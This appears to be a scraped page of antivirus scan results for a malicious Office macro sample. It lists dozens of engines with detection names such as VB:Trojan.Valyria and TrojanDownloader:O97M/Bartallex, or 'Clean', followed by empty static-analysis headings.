Trojan.Ole2.Vbs-heuristic.druvzi

SUPERAntiSpyware

Clean

MicroWorld-eScan

VB:Trojan.Valyria.163

Tencent

OLE.Win32.Macro.704456

Ad-Aware

VB:Trojan.Valyria.163

Emsisoft

VB:Trojan.Valyria.163 (B)

Comodo

TrojWare.VBS.Crypt.BN@8aystx

F-Secure

Clean

Baidu

VBA.Trojan.Kryptik.d

Zillya

Clean

TrendMicro

W2KM_POWLOAD.SME

McAfee-GW-Edition

BehavesLike.OLE2.Downloader.gb

FireEye

VB:Trojan.Valyria.163

Sophos

ATK/VbShlCde-A

SentinelOne

Static AI - Malicious OLE

GData

VB:Trojan.Valyria.163

Jiangmin

Clean

Avira

VBA/Dldr.Agent.dtfve

Antiy-AVL

Trojan/Generic.ASMacro.2DA0F

Kingsoft

Clean

Gridinsoft

Clean

Arcabit

VB:Trojan.Valyria.163

ViRobot

DOC.Z.Agent.457216

ZoneAlarm

Clean

Microsoft

TrojanDownloader:O97M/Bartallex.AA

TACHYON

Suspicious/W97M.MDRP.Gen

AhnLab-V3

VBA/Downloader.S12

Acronis

Clean

McAfee

RDN/Bartallex

MAX

malware (ai score=100)

VBA32

Clean

Zoner

Clean

Rising

Macro.Agent.bn (CLASSIC)

Yandex

Clean

Ikarus

Trojan.VBA.Crypt

MaxSecure

Clean

Fortinet

VBA/Kryptik.A!tr

AVG

VBA:Dropper-AK [Trj]

Static Analysis

Original

Deobfuscated

Original

Deobfuscated